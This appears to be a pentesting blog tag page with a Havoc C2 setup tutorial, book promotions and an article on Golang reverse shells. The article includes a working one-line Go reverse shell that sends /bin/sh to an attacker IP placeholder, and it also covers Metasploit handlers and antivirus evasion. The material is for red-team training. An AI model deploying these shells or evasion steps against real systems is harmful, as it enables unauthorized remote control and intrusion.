Tag: Linux

Tutorial: Havok C2 on Kali Linux

This is a sneak peak preview of part of a chapter from my new book – “Mastering Command and Control: Exploring C2 Frameworks using Kali Linux

Tool GitHub: https://github.com/HavocFramework/Havoc
Tool Wiki: https://havocframework.com/docs/welcome

Havoc is a GUI driven multi-user Command and Control (C2) framework written in Golang, C and ASM. It is easy to use and has many great features making it a great option for Red Teams. It is also quickly becoming the “C2” of choice in online cyber-attacks, so it’s good for Blue Teams to be familiar with it too. 

Havoc C2 – Installing

Havoc in now included in the repositories of the newest version of Kali Linux. It can be installed by just entering the tool name.

Open a Kali Terminal and enter the following commands:

  • sudo apt update
  • sudo apt upgrade
  • havoc (this will prompt you to install it)
  • cd /usr/share/havoc

You need to run Havoc from the install directory as it uses a config file (havoc.yaotl) in its profile directory. There are a few settings you can change in the config file, including Host, Port, Users and Passwords. Though I will just use the default config for this chapter.

Havoc is made up of two parts, the Team Server and a Client. You need to have both running in separate terminal windows.

Havoc C2 – Start the Team Server

  • Enter, “havoc server –profile ./profiles/havoc.yaotl -v

“-v” starts Havoc in verbose mode. If you want debug information, you can also add, “–debug”

Havoc C2 – Start the Client

Now we need to start the client, or the user interface to Havoc.

  • Open a Second Terminal
  • Navigate to “/usr/share/havoc
  • Enter, “havoc client
  • Click “New Profile
  • Then click “Connect

You could also use a name and password from profile located at – profiles/havoc.yaotl

Havoc C2 – Create A Listener

First up, we need to create a Listener. A Listener looks or listens for incoming shells when a target runs a payload, and creates the connection. 

  • Click “View” from the top menu
  • Then, “Listeners
  • Then, at the bottom of the screen click, “Add

Add a name and select a Payload type. I just used HTTP. Lastly, set the Host IP address and Port

Click “Save”

Havoc will save and then start the listener.

You can see the status of the Havoc in the Event Viewer window.

Havoc C2 – Generating a Payload

Next, we need to make a payload or shellcode for the target to run.

  • Click, “Attack” from the top menu and then, “Payload

Havoc gives you several options. We will just take the defaults and chose a Windows Executable for the payload type. You should see your new listener listed. If not, select it from the drop-down box. Make any changes you want, I made none, then click “Generate”. Havoc will create our attack payload. It will take a few seconds for it to generate, it will then prompt you to save it.

Now, all you need to do is Copy and Run this file on a target Windows system.

And we have a live session!

This is just the begining, in the full chapter we delve deeper into controlling the remote session.

Read more on Havok and on 11 other C2s in my new book!

Mastering Command and Control” available on Amazon.com

“Mastering Command & Control” Author’s Book Review

My newest book, “Mastering Command & Control – Exploring C2 Frameworks with Kali Linux” is out!

In the ever-evolving landscape of cybersecurity, proficiency in Command and Control (C2) frameworks is not just advantageous – it’s essential. Introducing “Mastering Command & Control,” a comprehensive guide created for security students and professionals looking to increase their knowledge of C2 platforms.

Dive deep into the world of red teaming and penetration testing as you embark on a journey through the industry’s most potent C2 frameworks. From Sliver and Empire to the depths of the renowned Metasploit framework, and more, this book is your path to mastery!

C2’s Covered:

  • Villain
  • Havoc C2
  • Sliver
  • Empire & StarKiller
  • Covenant
  • Silent Tritiny
  • PoshC2
  • Metasploit
  • With an overview of Merlin, Mythic, Cobalt Strike and Caldera!

You’ll navigate the installation and utilization of each framework, learning quickly with hands on tutorials utilizing the Kali Linux platform. Gain invaluable insights into obtaining remote shells, executing commands on target systems, and exploring similar modules on each framework. With a focus on practicality, each chapter equips you with the skills and knowledge needed to navigate the complex terrain of command and control with confidence.

Whether you’re a novice seeking to lay a solid foundation or a seasoned practitioner aiming to broaden your expertise, “Mastering Command & Control” is your definitive companion.

I wrote this guide as so many students were struggling with learning C2s. Also, many professionals in the field were looking for something to get them up to speed quick on C2 platforms. Thus, this book was born. I try to use similar commands, modules and techniques across each one. That way the reader can gain familiarity rapidly with each.  Using the step by step, learn by doing process that my readers have enjoyed for years.

C2 platforms are so critical and more so now with the huge explosion of Artificial Intelligence. Though the current C2’s aren’t dependent on AI, they soon will be. Make no doubt about it, C2s and AI ARE the future of security. The more you are familiar with them, know how to use them, the better prepared you will be for the future!

“Mastering Command and Control – Exploring C2 Frameworks with Kali Linux”, available now on Amazon.com!

NEW BOOK: “Password Cracking with Kali Linux”

My #1 New Release, “Password Cracking with Kali Linux” is out! The latest addition to my Security Testing with Kali Linux series is here!

Unlock the secrets of Windows password security with “Password Cracking with Kali Linux,” your ultimate guide to password cracking using Kali Linux. This book provides a comprehensive introduction to the fundamentals of Windows security, offering readers an in-depth exploration of tools, techniques, and strategies for password cracking.

From understanding the basics of Windows security to creating powerful wordlists for cracking tools, this book is a must-have for both novice and experienced cybersecurity enthusiasts. Learn the art of password cracking as you explore the tools, tactics, and techniques used by both security professionals and real-world attackers. This learn by doing book will help you gain hands-on experience in cracking Windows and Linux passwords using Kali Linux.

The latest in my, “Security Testing with Kali Linux” series, this book focuses solely on cracking password hashes, a critical skill for all Red Team members, Offensive Security Professionals, Pentesters, and Security Enthusiasts. It is a complete collection of all my writings on Password Cracking, taken from my books and articles, modified with additional new information and tools, and formed into a beginning to end book on password cracking.

Key Features:

  1. Fundamental Windows Security Insights: Gain a solid understanding of Windows security protocols, providing a foundation for effective ethical hacking.
  2. Tool and Technique Exploration: Dive into the world of ethical hacking tools and techniques, exploring Kali Linux’s powerful arsenal to crack Windows passwords.
  3. Wordlist Creation Mastery: Master the art of crafting custom wordlists, a crucial skill for optimizing password-cracking success.
  4. Linux Password Cracking: Extend your knowledge beyond Windows and explore the techniques used to crack Linux passwords, adding versatility to your ethical hacking toolkit.
  5. Defense Strategies: Equip yourself with the knowledge to defend against password attacks. Learn essential cybersecurity practices to secure Windows systems effectively.

Whether you’re a cybersecurity enthusiast, IT professional, or aspiring ethical hacker, “Password Cracking with Kali Linux” empowers you to navigate the complex world of password cracking responsibly and ethically. Take your skills to the next level and become a proficient defender against cyber threats with this comprehensive guide.

Check it out on Amazon.com!

Check out the other books in the series!

  1. Security Testing with Raspberry Pi, Second Edition Paperback
  2. Advanced Security Testing with Kali Linux Kindle Edition
  3. Basic Security Testing with Kali Linux, Fourth Edition

Getting Offensive with Golang

Introduction

Creating Reverse Shells and bypassing Anti-Virus (AV) with Golang. Using Golang in security has become very popular over the last few years. In this article I want to cover several existing Golang scripts that you can use to create Reverse Shells and possibly even bypass Anti-Virus.

This is part one of a two-part series. We will start our journey looking at a one-line reverse shell in Go, and then cover a couple apps that can generate multiple different shells. This article isn’t about writing custom Go scripts or post exploit – what to do after you get a remote shell. It is simply a quick and dirty overview of some existing Go shellcode for Pentesters and Red Teams.  

Swissky’s one-line Go shell is up first. This one-line reverse shell works great against Linux based targets. Next, we will look at Girsh, a menu driven script that can create multiple different reverse shells for both Linux and Windows.

In Part 2, we will look at Go-Shellcode, a very good Go reverse shell. At last testing and with the right payload, still bypasses most common Windows Anti-Virus products.

As always, this Article is for Educational & Informational Purposes Only. Never try to Access Systems that you do not have Permission to do so

I used two Kali Linux VMs for this article, one a target and the other an attack system. Golang was already installed on the attacking system. I also used a Windows 11 system and a Windows Server 2022 (not shown) for testing some of the shells.

Swissky Repo – Payload All the Thing, Golang Shell

Tool GitHub Site: https://github.com/swisskyrepo

Swissky’s Github site has a one-line reverse shell for Golang that works great on Linux. All you need is a Netcat listener set up on the attacker system and then run the one liner on the Linux target.

Just set up a Netcat Listener on the Attacking system:

On the target, take the one line Go payload from Swisskeyrepo1 and enter the attacker IP address. Then, run in on the target system.

echo ‘package main;import”os/exec”;import”net”;func main(){c,_:=net.Dial(“tcp”,”[Attacker_IP_Address]:4242″);cmd:=exec.Command(“/bin/sh”);cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}’ > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

As seen below:

If the target system has Golang installed, we immediately get a shell:

Before we continue, there are several Go reverse shells available online and on GitHub that basically just open a simple remote communication shell to Netcat. You don’t have to use Netcat on the attacker system, you can use the Metasploit Framework to catch this type of basic shell.

Yes, it also works for Netcat-like shellcode that is compiled to run on Windows targets as well. Granted it won’t be a Meterpreter shell, just a basic shell, but if the target is Windows based you could try the “upgrade shell to meterpreter” module in Metasploit. Windows Defender does catch and block the “upgrade shell to meterpreter” post module, but other AV products may not.

You can learn more about upgrading your shell to meterpreter here – https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html

Let’s take a minute and look at catching a basic Netcat shell with Metasploit.

Catching Netcat (Generic) Shells using Metasploit

You can use the Metasploit framework on your attacker system instead of just using Netcat. To do so, just start Metasploit on your attacking system and use a Multi Handler. For a Linux target you will need the “generic/shell_reverse_tcp” payload. Metasploit loads this as default, but I set it manually just to be sure. Then just enter your attacker IP address as LHOST and enter the port used as LPORT. When all is set, just enter “exploit”.

As seen below:

Now, run the one liner Go attack on the target system again. Metasploit acts like Netcat and completes the remote shell.

The process is the same if the target is Windows based, and you are using a Windows version of a Netcat like shell attack. Just change the payload in Multi Handler to the Windows x64 shell.

As seen below:

Notice the only change is switching from the generic shell to the Windows x64 shell. Using the plain reverse shell payloads in Metasploit, you can catch any of the Netcat shells written in any language, and for any target platform.  

Girsh – Golang Interactive Reverse Shell vs Linux

Tool Author: nodauf
Tool GitHub: https://github.com/nodauf/Girsh

Girsh is a quick and easy menu driven remote shell written in Golang. Until recently, the PowerShell module in Girsh did bypass Microsoft Defender and other major AV products. Though Defender catches it now, you may still have some luck with it against other AV products. For this example, we will create a quick Linux shell with it.    

Install & Usage

With Golang installed all you need to do is pull Girsh down from GitHub.

On first run it will download multiple dependencies. It will then display a Girsh prompt.

As seen below:

  • Type “menu” to create a reverse shell
  • Use the arrows to select an interface, then press enter
  • When prompted for a reverse shell type, select “python

You are presented with multiple Python commands. Copy and run one of them on your target system.

You should immediately get a remote session.

  • To see available sessions, type, “sessions
  • Then connect to the session you want using the “connect ID#” command

As seen below:

You now have a fully interactive remote shell.

In the next part of this article, we will look at using Go-Shellcode. A multi-function Go remote shell that works very well against Windows systems.

If you liked this article, check out my book, “Advanced Security testing with Kali Linux“, and the just released, “Basic security Testing with Kali Linux, 4th Edition” both available on Amazon.